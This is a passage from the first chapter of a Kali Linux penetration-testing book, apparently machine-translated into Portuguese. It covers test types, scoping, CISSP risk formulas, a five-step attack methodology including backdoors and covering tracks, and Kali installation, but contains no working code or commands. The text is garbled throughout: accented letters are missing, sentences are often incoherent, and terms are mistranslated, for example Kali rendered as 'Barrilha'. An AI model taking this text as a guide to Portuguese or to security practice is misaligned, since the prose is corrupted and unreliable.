Teste de caixa preta.
Caixa branca quando um verificador da penetrao tem conhecimento ntimo sobre o sistema.
Os objetivos do teste de penetrao so claramente definidos e os resultados do relatrio
a partir do teste normalmente esperado. O testador foi fornecido com detalhes sobre
o alvo, tais como informaes sobre a rede, o tipo de sistemas, processos da empresa, e
servios. Teste de caixa branca, tipicamente focada em um objetivo de negcio especfico
, tais como a uma necessidade conformidade, em vez da avaliao genrico, e pode ser
um engate mais curto, dependendo da forma como o espao-alvo limitado. Caixa branca
atribuies poderia reduzir coleta de informaes esforos, como reconhecimento
servios, igualando menos custos para os servios de testes de penetrao.
Um grupo de segurana interna geralmente executa teste de caixa branca.
Teste de caixa cinza cai entre preto e teste de caixa branca. quando a
cliente ou sistema proprietrio concorda que algumas informaes desconhecido acabar
ser descoberto durante uma fase de reconhecimento, mas permite que o verificador da penetrao
para pular esta parte. O verificador da penetrao fornecido alguns detalhes bsicos do alvo;
no entanto, funcionamento interno e algumas outras informaes privilegiadas ainda mantido
do verificador da penetrao.
[10]
Captulo 1
Atacantes reais tendem a ter algumas informaes sobre um alvo antes de se envolver
o alvo. A maioria dos agressores (com exceo de script kiddies ou indivduos
download de ferramentas e execut-los) no escolhem alvos aleatrios. Eles so
motivados e tm geralmente interagiram de alguma forma com o seu alvo antes de
tentar um ataque. Caixa cinza uma abordagem opo atraente para muitos segurana
profissionais que realizam testes de penetrao porque imita abordagens do mundo real
utilizado por atacantes e se concentra em vulnerabilidades em vez de reconhecimento.
O escopo do trabalho define a forma como os servios de penetrao ser iniciado e executado.
Ao inaugurar um compromisso de servio Teste de Invaso deve incluir uma informao
coleta de sesso usado para documentar o ambiente de destino e definir os limites
da atribuio de evitar servios desnecessrios ou sistemas de reconhecimento de ataque
que esto fora do escopo. Um escopo bem definido de trabalho vai economizar um prestador de
servios de
aumento do escopo (definido como mudanas no controladas ou crescimento contnuo em um projeto
de
escopo), operar dentro dos prazos previstos e ajudar a fornecer mais precisa
a entregar ao encerrar servios.
Atacantes de verdade no tem limites, tais como tempo, o financiamento, a tica, ou ferramentas
significado
que a limitao de mbito Teste de Invaso pode no representar um cenrio do mundo real.
Em contraste com um alcance limitado, tendo um alcance ilimitado nunca pode avaliar crtica
vulnerabilidades se um teste de penetrao concludo antes de atacar os sistemas desejados.
Por exemplo, um verificador da penetrao pode capturar as credenciais do usurio para sistemas
crticos
e concluir com acesso a esses sistemas sem testar o quo vulnervel os
sistemas so a ataques baseados em rede. Tambm importante incluir que est ciente de
o teste de penetrao como uma parte do escopo. Atacantes reais podem atacar a qualquer momento
e
provavelmente quando as pessoas esto menos esperava.
Alguns fundamentos para o desenvolvimento de um espao de trabalho para um teste de
penetrao so
como se segue:
Definio do sistema de destino (s): Isto especifica quais sistemas devem ser testados.
Isto inclui a localizao na rede, tipos de sistemas e uso comercial
desses sistemas.
Prazo do trabalho realizado: Quando o teste deve iniciar e que
o prazo previsto para atingir as metas especificadas. A melhor prtica no limitar
o escopo de tempo para o horrio comercial.
Como as metas so Avaliado: Que tipos de mtodos de teste, tais como
digitalizao ou explorao no so permitidas e? Qual o risco associado
com os mtodos de teste especficos permitidos? Qual o impacto das metas que
tornar-se inoperante devido a tentativas de penetrao? Exemplos so; usando sociais
rede, fingindo ser um funcionrio, ataque de negao de servio em chave
sistemas, ou a execuo de scripts em servidores vulnerveis. Alguns mtodos de ataque
pode representar um risco maior de sistemas prejudiciais do que outros.
[11]


Teste de Invaso e Configurao
Ferramentas e software: Quais as ferramentas e software so usados durante a penetrao
Teste? Isto importante e um pouco controverso. Muitos profissionais de segurana
Acredito que se eles divulgam suas ferramentas de que estar dando seu molho secreto.
Acreditamos que este apenas o caso quando os profissionais de segurana amplamente
utilizado
produtos comerciais disponveis e so simplesmente rebranding relatrios enlatados de
estes produtos. Profissionais de segurana experientes iro disponibilizar as ferramentas que
so
utilizado, e, em alguns casos, quando as vulnerabilidades so exploradas, documentao
os comandos usados dentro das ferramentas para explorar uma vulnerabilidade. Isso faz com
que o
explorar recriados, e permite que o cliente realmente entender como o sistema
foi comprometida ea dificuldade associada com a explorar. Partes notificadas: Quem est ciente do Teste de Invaso? Eles esto informados
antemo e capaz de preparar? reao aos esforos de penetrao parte
o mbito a ser testado? Se assim for, pode fazer sentido para no informar a segurana
equipe de operaes antes do teste de penetrao. Isto muito importante quando
olhando para aplicaes web que podem ser hospedados por outra parte, como um
nuvem provedor de servios que podem ser afetados a partir de seus servios.
Acesso Inicial Nvel: Que tipo de informao eo acesso fornecido
antes de chutar fora o Teste de Invaso? O verificador da penetrao tm
acesso ao servidor via Internet e / ou Intranet? Que tipo de conta inicial
nvel de acesso concedido? este um preto, branco, cinza ou atribuio caixa para
cada alvo?
Definio de Espao Pblico-alvo: Este define as funes especficas de negcios
includo no teste de penetrao. Por exemplo, a realizao de um teste de penetrao
em uma aplicao web especfico utilizado por vendas, enquanto no tocar em um diferente
aplicativo hospedado no mesmo servidor.
Identificao de reas de operao crtica: Definir sistemas que no deveria
ser tocado para evitar um impacto negativo nos servios de testes de penetrao.
limites do servidor de autenticao ativo fora? importante fazer crtica
ativos clara antes de contratar um alvo.
Definio da Bandeira: importante definir o quanto um Penetrao
Teste deve comprometer um sistema ou um processo. Caso os dados sejam
removidos
a partir da rede ou que o intruso apenas obter um determinado nvel de
acesso no autorizado?
Produto final: Que tipo de relatrio final esperado? Que metas faz o
cliente especificar a ser realizado aps o fechamento de um servio Teste de Invaso
acordo? Certifique-se que as metas no so uma durao limitada para evitar aumento do
escopo
servio do esperado. qualquer um dos dados classificados ou designados para um
determinado
grupo de pessoas? Como deve ser o relatrio final ser entregue? importante
para entregar um relatrio de exemplo ou atualizaes peridicas para que no haja
surpresas
no relatrio final.
[12]






Captulo 1
Expectativas de remediao: Voc vulnerabilidades dever ser documentado
com possveis itens de ao de remediao? Quem deve ser notificado se um sistema
inutilizada durante um exerccio de Teste de Invaso? O que acontece
se os dados confidenciais so detectados? A maioria dos servios de testes de penetrao
no
incluir remediao de problemas encontrados.
Algumas definies de servio que devem ser usados para definir o escopo de servios so:
Auditoria de Segurana: Avaliando um nvel de risco de uma aplicao do sistema ou contra
um
conjunto de normas ou linhas de base. As normas so regras obrigatrias, enquanto as
linhas de base
so o nvel mnimo aceitvel de segurana. Normas e linhas de base atingir
consistncia nas implementaes de segurana e pode ser especfico para as indstrias,
tecnologias e processos.
A maioria dos pedidos de segurana serve para auditorias esto focados em passar uma
auditoria oficial (por exemplo, se preparando para uma empresa ou um governo
auditoria), ou provar os requisitos bsicos so atendidas por um conjunto obrigatrio de
regulamentaes (por exemplo a seguir os mandatos HIPAA e HITECH para
proteger registros de sade). importante informar os potenciais clientes
se os seus servios de auditoria incluem qualquer nvel de seguro ou proteo se uma
auditoria
no for bem sucedida depois de seus servios. Tambm fundamental para documentar o
tipo
de remediao includo com servios de auditoria (isto , se voc faria
identificar um problema, oferecer um plano de ao de remediao ou corrigir o problema).
Auditoria de conformidade muito mais do que correr uma ferramenta de segurana. Ele se
baseia
pesadamente sobre os tipos padro de relatrios e seguindo uma metodologia que
um padro aceito para a auditoria.
Em muitos casos, as auditorias de segurana aos clientes uma falsa sensao de segurana
dependendo do que normas ou linhas de base esto sendo auditados. A maioria das normas
e linhas de base tm um processo de atualizao muito tempo que no capaz de manter-se
com
as rpidas mudanas nas ameaas encontradas no mundo ciberntico de hoje.
ALTAMENTE
recomendado para oferecer servios de segurana para alm das normas e linhas de base
para
elevar o nvel de segurana para um nvel aceitvel de proteo para real
ameaas. Servios devem incluir o acompanhamento com os clientes para ajudar com
remediao, juntamente com a elevar a fasquia para a segurana para alm de qualquer
indstria
normas e linhas de base.
Avaliao de Vulnerabilidade: Este o processo em que os dispositivos de rede,
sistemas operacionais e software de aplicao so verificados, a fim de identificar
a presena de vulnerabilidades conhecidas e desconhecidas. A vulnerabilidade uma
lacuna,
erro, ou fraqueza na forma como um sistema projetado, usado e protegido. Quando
uma vulnerabilidade explorada, pode resultar em dar acesso no autorizado,
escalada de privilgios, ao ativo, ou outros resultados de negao de servio.
[13]
Teste de Invaso e Configurao
Avaliaes de Vulnerabilidade tipicamente parar uma vez que uma vulnerabilidade
encontrada,
o que significa que o verificador da penetrao no executar um ataque contra
a vulnerabilidade para verificar se ele genuno. A Avaliao de Vulnerabilidade
entrega oferece risco potencial associado com todas as vulnerabilidades
encontrado com possveis medidas de remediao. Existem muitas solues, tais como
Kali Linux que pode ser usado para fazer a varredura em busca de vulnerabilidades com
base no sistema /
tipo de servidor, sistema operacional, portas abertas para a comunicao e outros
significa. Avaliaes de Vulnerabilidade pode ser branco, cinza, ou de caixa preta
dependendo da natureza da tarefa.
Scans de vulnerabilidade s so teis se calcular o risco. A desvantagem de
muitas auditorias de segurana os resultados da verificao de vulnerabilidade que fazem
auditorias de segurana
mais espessa, sem fornecer qualquer valor real. Muitos scanners de vulnerabilidade
ter falsos positivos ou identificar vulnerabilidades que no esto realmente l. Eles
fazer isso porque eles incorretamente identificar o sistema operacional ou est procurando
especfico
patches para corrigir as vulnerabilidades, mas no olhando para os patches cumulativos
(patches que
conter vrias manchas menores) ou revises de software. Atribuindo risco para
vulnerabilidades d uma verdadeira definio e senso de quo vulnervel um sistema
. Em muitos casos, isso significa que os relatrios de vulnerabilidade atravs de
ferramentas automticas
ter de ser marcada.
Os clientes vo querer saber o risco associado vulnerabilidade e
custo esperado para reduzir os riscos encontrados. Para fornecer o valor de custo,
importante entender como calcular o risco.
Calculando risco
importante entender como calcular o risco associado com vulnerabilidades
encontrado, de modo que uma deciso pode ser feito sobre a forma de reagir. A maioria dos
clientes olhar
ao tringulo CISSP da CIA ao determinar o impacto do risco. CIA o
confidencialidade, integridade e disponibilidade de um determinado sistema ou aplicativo.
Ao determinar o impacto do risco, os clientes devem olhar para cada componente
individualmente, bem como a vulnerabilidade em sua totalidade para obter uma perspectiva
verdadeira
do risco e determinar a probabilidade de impacto.
Cabe ao cliente decidir se o risco associado vulnerabilidade encontrada justifica
ou supera o custo de controles necessrios para reduzir o risco a um nvel aceitvel.
Um cliente pode no ser capaz de gastar um milho de dlares em remediar uma ameaa que
compromete impressoras de hspedes, no entanto, eles sero muito disposto a gastar duas vezes
mais
tanto em sistemas com dados confidenciais da empresa protegendo.
[14]
Captulo 1
O Certified Information Systems Security Professional (CISSP) Listas de currculo
frmulas para calcular o risco da seguinte forma.
AExpectativa de perda nica (LES) o custo de uma simples perda de um Valor Patrimonial (AV).
Fator de Exposio (EF) o impacto da perda do activo vai ter a uma organizao
como a perda de receita devido a um servidor voltado para a Internet a ser encerrado. Clientes
deve calcular a SLE de um ativo ao avaliar os investimentos de segurana para ajudar
identificar o nvel de financiamento que deve ser atribudo para controles. Se um SLE faria
causar um milho de dlares em danos para a empresa, no faria sentido considerar
que no oramento.
A nica frmula expectativa de perda:
SLE = AV * EF
O prximo frmula importante identificar a freqncia com que o LES pode ocorrer. Se um
SLE vale um milho de dlares poderia acontecer uma vez em um milho de anos, como um
meteoro
caindo do cu, pode no valer a pena investir milhes em uma redoma de proteo
em torno de seu quartel-general. Em contrapartida, se um incndio pode causar um milho de
dlares
de dano e esperado a cada dois anos, seria aconselhvel investir em um incndio
sistema de preveno. O nmero de vezes que um ativo perdido chamado de Taxa Anual de
Ocorrncia (ARO).
O Expectativa de perda anual (ALE) uma expresso da perda antecipada anual
devido ao risco. Por exemplo, uma queda de meteoros tem uma baixa expectativa de anualizada
(Uma vez em um milho de anos), enquanto que um incndio muito mais provvel e deve ser
calculada em
futuros investimentos para a proteo de um edifcio.
Anualizado frmula expectativa de perda:
ALE = SLE * ARO
A pergunta final e importante a ser respondida o risco associado a um ativo usado
para descobrir o investimento para os controles. Isto pode determinar se, e quanto a
cliente deve investir em remediar a vulnerabilidade encontrada em um ativo.
Frmula de risco:
Risco = Valor Patrimonial * Ameaa * Vulnerabilidade *
Impacto
comum que os clientes no tm valores para as variveis em Gesto de Riscos
frmulas. Estas frmulas servem como sistemas de orientao, para ajudar o cliente a melhor
entender como eles devem investir em segurana. Nas minhas exemplos anteriores, utilizando a
frmulas com valores estimados para uma chuva de meteoros e fogo em um edifcio, deve
ajudar a explicar com valor em dlar estimada por um sistema de preveno de incndios uma
melhor
investimento de cpula de metal protegendo a queda de objetos.
[15]
Teste de Invaso e Configurao
Teste de Invaso o mtodo de atacar as vulnerabilidades do sistema de forma semelhante
para ataques maliciosos reais. Normalmente, os servios de testes de penetrao so solicitados
quando
um sistema ou rede esgotou os investimentos em segurana e os clientes esto buscando
verificar se todas as vias de segurana foram cobertas. Teste de Invaso pode ser preto,
Branco ou caixa cinza, dependendo do escopo de trabalho acordado.
A principal diferena entre a Avaliao de teste de penetrao e vulnerabilidade
que um teste de penetrao vai agir sobre vulnerabilidades encontradas e verificar se eles esto
reduzindo reais da lista de risco associado confirmada com um alvo. A Vulnerabilidade
Avaliao de um alvo pode mudar para um teste de penetrao uma vez que o proprietrio do ativo
autorizou o prestador de servios para executar ataques contra as vulnerabilidades
identificado num alvo. Normalmente, os servios de testes de penetrao tm um custo mais elevado
associado desde os servios exigem recursos mais caros, ferramentas e tempo para
completar tarefas com sucesso. Um equvoco popular que a penetrao
Servio de teste aumenta a segurana de TI pois os servios tm um custo mais elevado associado
de outros servios de segurana:
O Teste de Invaso no tornar as redes de TI mais seguro, j que os servios
avaliar a segurana existente! Um cliente no deve considerar um Penetrao
Testar se h uma crena a meta no completamente seguro.
Teste de Invaso pode causar um impacto negativo aos sistemas: fundamental para
ter autorizao por escrito das autoridades competentes, antes de iniciar
Um teste de penetrao de um ativo pertence a outro partido. No ter adequado
autorizao pode ser visto como pirataria ilegal pelas autoridades. Autorizao
deve incluir quem responsvel por quaisquer danos causados durante a penetrao
exerccio, bem como quem deve ser contactado a fim de evitar futuros impactos negativos
uma vez que um sistema danificado. A melhor prtica alertar os clientes de toda a
riscos potenciais associados com cada mtodo usado para comprometer um alvo
antes de executar o ataque para definir as expectativas de nvel. Este tambm um dos
razes que recomendamos Teste de Invaso alvejado com um pequeno alcance.
mais fcil de ser muito mais metdico na sua abordagem. Como comum
melhores prticas, recebemos a confirmao, que um cenrio de pior caso, que uma
sistema pode ser restaurado por um cliente usando backups ou algum outro desastre
mtodo de recuperao.

Teste de Penetrao expectativas entregveis devem ser bem definidos embora concordando
em um escopo de trabalho. Os mtodos mais comuns pelo qual hackers obtm informaes
sobre as metas atravs de engenharia social atravs de atacar as pessoas, em vez de sistemas.
Exemplos est entrevistando para uma posio dentro da organizao e saindo um
semana depois com dados sensveis oferecidos sem resistncia. Este tipo de entrega maio
no ser aceitvel se um cliente est interessado em saber o quo vulnervel a web
aplicaes so para o ataque remoto. tambm importante ter um objectivo final definido assim
que todas as partes compreendam quando os servios de penetrao so considerados concluiu.
Normalmente, uma entrega acordados serve esse propsito.
[16]
Captulo 1
O sucesso de um engajamento teste de penetrao para um prestador de servios baseado em
rentabilidade de tempo e servios utilizados para entregar o engajamento Teste de Invaso.
Um processo mais eficiente e preciso significa melhores resultados para menos servios utilizados.
Quanto maior for a qualidade dos resultados, quanto mais prximo o servio pode atender ao cliente
expectativa, resultando em uma melhor reputao e mais negcios no futuro. Para estes
razes, importante desenvolver uma metodologia para a execuo de testes de penetrao
servios, bem como sobre como denunciar o que for encontrado.
Conceitos Kali Testes de Penetrao
Kali Linux destina-se a seguir os fluxos de um servio de teste de penetrao
noivado. Independentemente se o ponto de partida branco, preto, ou teste de caixa cinza,
h um conjunto de passos que devem ser seguidas ao Teste de Invaso um alvo
com Kali ou outras ferramentas.
Passo 1 - Reconhecimento
Voc deve aprender o mximo possvel sobre o ambiente de um alvo eo sistema
traos antes de lanar um ataque. Quanto mais informaes voc pode identificar cerca de
um alvo, a melhor chance que voc tem que identificar o caminho mais fcil e mais rpido para o
sucesso.
Teste de caixa preta requer mais reconhecimento do que o teste de caixa branca, pois os dados so
no fornecidas sobre o alvo (s). Servios de reconhecimento pode incluir pesquisa
pegada de Internet de um alvo, os recursos de monitoramento, pessoas e processos, digitalizao
para obter informaes de rede, como endereos IP e tipos de sistemas, engenharia social
servios pblicos, como help desk e outros meios.
Reconhecimento o primeiro passo de um compromisso de servio Teste de Invaso
independentemente se voc est verificando a informao conhecida ou buscando nova inteligncia
em um alvo. Reconnaissance comea por definir o ambiente de destino com base em
o escopo do trabalho. Uma vez que o alvo identificado, a pesquisa realizada para reunir
inteligncia no alvo, como o que portas so usadas para a comunicao, onde
ele est hospedado, o tipo de servios oferecidos aos clientes, e assim por diante. Esta vontade de
dados
desenvolver um plano de ao em relao aos mtodos mais fceis de obter os resultados
desejados.
A entrega de um trabalho de reconhecimento deve incluir uma lista de todos os bens
sendo alvo, quais aplicativos esto associados com os ativos, servios utilizados, e
possveis proprietrios de ativos.
Kali Linux oferece uma categoria denominada Coleta de Informaes que serve como
um recurso de reconhecimento. As ferramentas incluem mtodos para a pesquisa de rede,
dados
sistemas de centro, sem fio e de acolhimento.
[17]
Teste de Invaso e Configurao
O seguinte a lista de objetivos de reconhecimento:







Identificar alvo (s)
Definir aplicativos e uso comercial
Identificar tipos de sistemas
Identificar portas disponveis
Identificar servios em execuo
Informaes engenheiro passivamente sociais
Descobertas de documentos
Etapa 2 - Avaliao Alvo
Uma vez que um alvo identificado e pesquisado a partir de esforos de reconhecimento, a
prxima
passo avaliar o alvo para vulnerabilidades. Neste ponto, a penetrao
Tester deve saber o suficiente sobre um alvo para selecionar como analisar a possvel
vulnerabilidades ou fraqueza. Exemplos para testes para a fraqueza na forma como a web
aplicao opera, os servios identificados, portas de comunicao, ou outros meios.
Avaliaes de vulnerabilidade e auditorias de segurana tipicamente concluir aps este
fase do processo de avaliao alvo.
Capturando informaes detalhadas atravs Reconnaissance melhora a preciso
de direcionamento de possveis vulnerabilidades, reduz o tempo de execuo para executar alvo
servios de avaliao, e ajuda a evitar de segurana existente. Por exemplo, executando
um scanner de vulnerabilidade genrico contra um servidor de aplicativos web seria provavelmente
alertar o proprietrio do ativo, tome um tempo para executar e gerar apenas detalhes genricos
sobre o sistema e aplicaes. Digitalizar um servidor para uma vulnerabilidade especfica
com base em dados obtidos a partir Reconnaissance seria mais difcil para o proprietrio do ativo
de detectar, proporcionar uma boa vulnerabilidade possvel explorar e tomar segundos
para executar.
Avaliando metas para vulnerabilidades pode ser manual ou automtico atravs de
ferramentas. H uma srie de ferramentas oferecidas em Kali Linux agrupados como uma
categoria rotulada
Anlise de Vulnerabilidade. Ferramentas variam de avaliar os dispositivos de rede de bancos de
dados.
O seguinte a lista de objetivos de avaliao Alvo:




Alvos de avaliao para fraqueza
Identificar e priorizar os sistemas vulnerveis
Mapa sistemas vulnerveis aos proprietrios de
ativos
Descobertas de documentos
[18]
Captulo 1
Passo 3 - Explorao
Esta etapa explora vulnerabilidades encontradas para verificar se as vulnerabilidades so reais e que
possvel de informaes ou acesso pode ser obtido. Explorao separa Penetrao
Testando servios de servios passivos tais como avaliaes de vulnerabilidade e auditorias.
A explorao e todas as etapas a seguir tm ramificaes legais sem autorizao
dos proprietrios de ativos do alvo.
O sucesso desta etapa fortemente dependente de esforos anteriores. A maioria dos exploits
so desenvolvidos para vulnerabilidades especficas e pode causar consequncias indesejveis
se executado de forma incorreta. A melhor prtica identificar um punhado de vulnerabilidades e
desenvolvimento de uma estratgia de ataque baseado na liderana com o primeiro mais
vulnerveis.
Explorando alvos pode ser manual ou automatizado de acordo com o objectivo final.
Alguns exemplos esto executando o SQL Injees para ganhar acesso de administrador para uma
aplicao web
ou engenharia social uma pessoa Helpdesk em fornecer credenciais de login de administrador.
Kali Linux oferece um catlogo dedicado de ferramentas intitulado Ferramentas de Explorao para a
explorao de
metas que vo desde a explorao de servios especficos para pacotes de engenharia social.
O seguinte a lista de objetivos de explorao:






Explorar vulnerabilidades
Obter apoio para o p
Captura de dados no autorizada
Engenheiro agressivamente sociais
Atacar outros sistemas ou aplicaes
Descobertas de documentos
Passo 4 - Privilege Escalation
Ter acesso a um alvo no garante a realizao do objetivo de uma penetrao
atribuio. Em muitos casos, um sistema de explorao de vulnervel s pode dar limitado
acesso aos dados e recursos de um alvo. O atacante deve escalar privilgios concedidos
para obter o acesso necessrio para capturar a bandeira, o que poderia ser dados sensveis, crticos
infra-estrutura, e assim por diante.
Privilege Escalation pode incluir a identificao e rachaduras senhas, contas de usurio,
e espao de TI no autorizado. Um exemplo alcanar o acesso de usurio limitado, identificando
um arquivo shadow contendo as credenciais de login de administrao, a obteno de um
administrador
senha atravs de quebra de senha e acessar sistemas aplicativos internos
com direitos de acesso de administrador.
[19]
Teste de Invaso e Configurao
Kali Linux inclui uma srie de ferramentas que podem ajudar a ganhar Privilege Escalation atravs
o Ataques senha e Ferramentas de Explorao catlogo. Como a maioria dessas ferramentas
incluem mtodos para obter acesso inicial e Privilege Escalation, eles esto reunidos
e agrupados de acordo com os seus conjuntos de ferramentas.
A seguir est uma lista de objetivos escalonamento de
privilgios:




Obter acesso Escalado nvel de sistema (s) e rede (s)
Descubra outras informaes de conta de usurio
Acessar outros sistemas com privilgios escalados
Descobertas de documentos
Passo 5 - a manuteno de um ponto de
apoio
O passo final manter o acesso ao estabelecer outros pontos de entrada para o destino
e, se possvel, cobrindo evidncia da penetrao. possvel que a penetrao
esforos ir acionar as defesas que acabar por garantir como o verificador da penetrao
obtido o acesso rede. A melhor prtica estabelecer outros meios de acesso
o alvo como um seguro contra o principal caminho a ser fechado. Acesso alternativo
mtodos poderiam ser backdoors, novas contas de administrao, tneis criptografados,
e novos canais de acesso rede.
O outro aspecto importante da manuteno de uma posio em um alvo est removendo
evidncia da penetrao. Isso far com que seja mais difcil de detectar o ataque, assim,
reduzindo a reaco por barreiras de segurana. Removendo evidncia inclui apagamento
usurio fizer, mascarando os canais de acesso existentes e remover os vestgios de adulterao
como mensagens de erro causadas por esforos de penetrao.
Kali Linux inclui um catlogo intitulado Mantendo o acesso focado em manter uma
ponto de apoio dentro de um alvo. As ferramentas so usadas para estabelecer diversas formas de
backdoors
em um alvo.
A seguir est uma lista de metas para a manuteno de um ponto de
apoio:






Estabelecer vrios mtodos de acesso rede alvo
Remover prova de acesso autorizado
Sistemas de reparo que impactam pela explorao
Injetar dados falsos, se necessrio
Esconder mtodos de comunicao por meio de criptografia e outros meios
Descobertas de documentos
[20]
Captulo 1
Apresentando Kali Linux
Os criadores do BackTrack lanaram um novo Teste de Invaso, avanado
Distribuio Linux chamada Kali Linux. BackTrack 5 foi a ltima verso principal do
a distribuio BackTrack. Os criadores do BackTrack decidiu que para avanar
com os desafios da segurana ciberntica e testes moderno uma nova fundao foi
necessrio. Kali Linux nasceu e foi lanado em 13 de maro de 2013. Kali Linux baseado
em Debian e um sistema de arquivos FHS-compliant.
Kali tem muitas vantagens sobre BackTrack. Ele vem com muitas ferramentas mais atualizadas.
As ferramentas so simplificados com os repositrios do Debian e sincronizados quatro vezes
um dia. Isso significa que os usurios tenham as ltimas atualizaes de pacotes e correes de
segurana. O novo
sistemas de arquivos compatveis traduzir-se em execuo a maioria das ferramentas de qualquer
lugar no sistema.
Kali tambm fez personalizao, instalao automtica, e rea de trabalho flexvel
ambientes caractersticas fortes em Kali Linux.
Kali Linux est disponvel para download em http://www.kali.org/.
Configurao do sistema
Kali
Kali Linux pode ser baixado em algumas maneiras diferentes. Um dos mais populares
maneiras de obter Kali Linux baixar a imagem ISO. A imagem ISO est disponvel
em imagens de 32 bits e de 64 bits.
Se voc planeja usar o Kali Linux em uma mquina virtual como o VMware, no
uma imagem pr-construdos VM. A vantagem de baixar a imagem da VM que
ele vem pr-carregado com ferramentas VMware. A imagem de VM uma imagem de 32 bits com
Physical Address Extension apoio, ou mais conhecido como PAE. Em teoria, um PAE
do kernel permite que o sistema para acessar mais memria do que um sistema tradicional de 32 bits
sistema operativo. Houve algumas personalidades bem conhecidas no mundo da
sistemas operacionais que tm argumentado a favor e contra a utilidade de um kernel PAE.
No entanto, os autores deste livro sugiro usar a imagem da VM de Kali Linux se
planeja us-lo em um ambiente virtual.
Correndo Kali Linux a partir de uma mdia externa
Kali Linux pode ser executado sem instalao de software em um disco rgido de acolhimento,
acessando
lo de uma fonte de mdia externa, como uma unidade de DVD ou USB. Este mtodo simples
para permitir, no entanto, tem o desempenho e implementaes operacionais. Kali Linux
ter que carregar programas a partir de uma fonte remota iria afetar o desempenho e alguns
aplicativos ou configuraes de hardware podem no funcionar corretamente. Usando somente leitura
de armazenamento
mdia no permite salvar as configuraes personalizadas que podem ser necessrios para fazer Kali
Linux
operar corretamente. altamente recomendado para instalar Kali Linux em um disco rgido host.
[21]
Teste de Invaso e Configurao
Instalando Kali Linux
Instalando Kali Linux em seu computador simples e semelhante instalao
outros sistemas operacionais. Em primeiro lugar, voc vai precisar de hardware compatvel. Barrilha
compatvel com i386, amd64 e plataformas ARM (ambos Armel e armhf). O
requisitos de hardware so mostrados na lista a seguir, embora sugerimos
excedendo o valor mnimo por pelo menos trs vezes. Kali Linux, em geral,
ter um desempenho melhor se ele tem acesso a mais memria RAM e instalado em mquinas
mais novas.
Baixe Kali Linux e quer queimar o ISO para DVD, ou preparar um pendrive com
Kali Linux Viva como o meio de instalao. Se voc no tiver uma unidade de DVD ou um
Porta USB do seu computador, confira o Linux Network Kali Instalar.
A seguir est uma lista de requisitos mnimos de instalao:




Um mnimo de 8 GB de espao em disco para a instalao de Kali
Linux.
Para arquiteturas i386 e amd64, um mnimo de 512MB de RAM.
Suporte de inicializao de CD-DVD Drive /
USB.
Voc tambm vai precisar de uma conexo ativa com a Internet antes da instalao. Este
muito importante ou voc no ser capaz de configurar e acessar repositrios
durante a instalao.
1. Quando voc comear a Kali, voc ser presenteado com uma tela de inicializao de
instalao.
Voc pode escolher o tipo de instalao (baseado em GUI ou baseado em texto)
voc gostaria de realizar.
[22]
Captulo 1
2. Selecione o idioma de preferncia local, pas e
preferncias do teclado.
3. Escolha um nome de host para o host Kali Linux. O padro
hostname Kali.
[23]
Teste de Invaso e Configurao
4. Escolha uma senha. Senhas simples pode no funcionar to
Escolheu algo que tem um certo grau de complexidade.
5. O prximo prompt pede para o seu fuso horrio. Modificar de acordo
e selecione Continuar. A prxima imagem mostra a seleo
Oriental tempo padro.
[24]
Captulo 1
O instalador ir pedir para configurar suas parties. Se voc estiver instalando em uma Kali virtuais
imagem, selecione Guiado Instale - disco inteiro. Isto ir destruir todos os dados do disco
Kali e instalar Linux. Tenha em mente que em uma mquina virtual, s o disco virtual
est sendo destrudo. Os usurios avanados podem selecionar configuraes manuais para
personalizar
parties. Kali tambm oferece a opo de utilizar LVM, gerente de volume lgico. LVM
permite-lhe gerir e redimensionar parties aps a instalao. Em teoria, supe-se
para permitir a flexibilidade, quando as necessidades de armazenamento de mudar de instalao
inicial. No entanto,
a menos que as suas necessidades de Kali Linux so extremamente complexas, muito provavelmente
voc no vai precisar
us-lo.
[25]
Teste de Invaso e Configurao
6. A ltima janela apresenta uma reviso das definies de instalao. Se
tudo parece correto, selecione Sim para continuar o processo, como mostrado
na imagem seguinte:
7. Kali Linux usa repositrios centrais de distribuio de aplicativos
pacotes. Se voc gostaria de instalar esses pacotes, voc precisa usar
um espelho de rede. Os pacotes so baixados atravs do protocolo HTTP.
Se sua rede usa um servidor proxy, voc tambm vai precisar configurar
as configuraes de proxy para voc rede.
[26]
Captulo 1
8. Kali ir pedir para instalar o GRUB. GRUB um multi-bootloader que
d ao usurio a capacidade de escolher e arrancar a operao mltipla
sistemas. Em quase todos os casos, voc deve selecionar para instalar o GRUB. Se
voc
est configurando o seu sistema de dual boot, voc vai querer ter
certeza GRUB reconhece os outros sistemas operacionais a fim de que a
dar aos usurios as opes para inicializar em um sistema operacional alternativo.
Se ele no detectar quaisquer outros sistemas operacionais, a mquina
iniciar automaticamente em Kali Linux.
[27]
Teste de Invaso e Configurao
9. Parabns! Voc terminou de instalar Kali Linux. Voc ir
deseja remover todos os meios (fsicos ou virtuais) e selecione Continuar
para reiniciar o sistema.
[28]
Captulo 1
Kali Linux e VM imagem primeira corrida
Em alguns mtodos de instalao Kali, voc ser solicitado a definir a senha do root.
Quando Kali Linux inicializa, digite o nome de usurio do root ea senha que voc selecionou.
Se voc baixou uma imagem de VM de Kali, voc vai precisar da senha de root. O padro
nome de usurio raiz e senha toor.
Viso geral ferramentas Kali
Kali Linux oferece uma srie de ferramentas personalizadas concebidas para testes de
penetrao.
Ferramentas so classificadas nos seguintes grupos como visto no menu drop-down
mostrado na tela a seguir:
[29]
Teste de Invaso e Configurao
Coleta de Informaes: Estas so ferramentas de reconhecimento utilizados para coletar
dados
em sua rede alvo e dispositivos. Ferramentas variam de identificar os dispositivos a
protocolos utilizados.
Anlise de Vulnerabilidade: Ferramentas deste seco concentrar em sistemas de avaliao
de vulnerabilidades. Normalmente, estes so executados em sistemas encontrados usando
o
Coleta de informaes ferramentas de reconhecimento.
Aplicaes Web: Estas so ferramentas utilizadas para auditar e explorar vulnerabilidades
em servidores web. Muitas das ferramentas de auditoria, vamos referimos neste livro vm
directamente a partir desta categoria. No entanto aplicaes web nem sempre se referem
de ataques contra servidores web, eles podem simplesmente ser ferramentas baseadas na
Web para
servios de rede. Por exemplo, a web proxies ser encontrado em
nesta seo.
Senha Ataques: Esta seo de ferramentas lida principalmente com a fora bruta ou
a computao desligada de senhas ou cdigos compartilhados usados para autenticao.
Ataques sem fio: Estas so ferramentas utilizadas para explorar as vulnerabilidades
encontradas em
protocolos sem fio. 802.11 ferramentas sero encontrados aqui, incluindo ferramentas
como
aircrack, airmon e ferramentas de quebra de senhas wireless. Alm disso, esta
seo tem ferramentas relacionadas a vulnerabilidades de RFID e Bluetooth tambm. Em
muitos casos, as ferramentas desta seo ter de ser usado com uma rede sem fio
